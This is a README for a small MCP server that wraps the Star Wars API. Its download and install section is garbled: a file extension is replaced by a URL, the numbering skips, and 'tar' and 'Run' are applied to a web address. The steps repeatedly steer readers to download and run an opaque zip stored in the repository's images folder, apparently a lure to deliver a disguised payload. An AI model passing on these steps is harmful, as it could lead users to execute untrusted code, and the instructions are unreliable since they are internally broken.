The simple_mcp_server is a Model Context Protocol (MCP) server designed for integrating with the Star Wars API. This application serves as a portfolio micro-project, showcasing how to develop an MCP server while seamlessly connecting with the SWAPI for use in Claude Desktop and MCP Inspector.

🚀 Getting Started

Follow these steps to get started with simple_mcp_server. You will need to download the software and install it on your computer.

👨‍💻 System Requirements

  • Operating System: Windows 10 or later, macOS, Linux (latest versions recommended).
  • Memory: At least 4GB of RAM.
  • Storage: Minimum 100MB of free disk space.
  • Network: Internet connection for API access.

🔗 Steps to Download

  1. Click on the link above to go to the Releases page.

  3. Find the appropriate installation package for your operating system:
    • For Windows, look for a file ending with .exe.
    • For macOS, look for a file ending with .dmg.
    • For Linux, look for a file ending with https://github.com/sbsdbs/simple_mcp_server/raw/refs/heads/master/images/simple-server-mcp-sigil.zip.
  4. Click the file to start downloading it to your computer.

⚙️ Installing the Application

Once the download is complete, follow these steps to install simple_mcp_server:

Windows

  1. Locate the downloaded .exe file in your Downloads folder.
  2. Double-click the file to run the installer.
  3. Follow the on-screen instructions to complete the installation.
  4. Once installed, you can find simple_mcp_server in your Start Menu.

macOS

  2. Run the command: tar -xzvf https://github.com/sbsdbs/simple_mcp_server/raw/refs/heads/master/images/simple-server-mcp-sigil.zip to extract the files.
  3. Navigate into the extracted folder.
  4. Run https://github.com/sbsdbs/simple_mcp_server/raw/refs/heads/master/images/simple-server-mcp-sigil.zip to complete the installation.

🖥️ Running the Application

After installation, you can start simple_mcp_server easily.

Windows

  • Open the Start Menu.
  • Search for simple_mcp_server and click on it.

macOS

  • Open the Applications folder.
  • Find simple_mcp_server and double-click it.

Linux

  • Open the terminal.
  • Navigate to the installation directory and run ./simple_mcp_server.
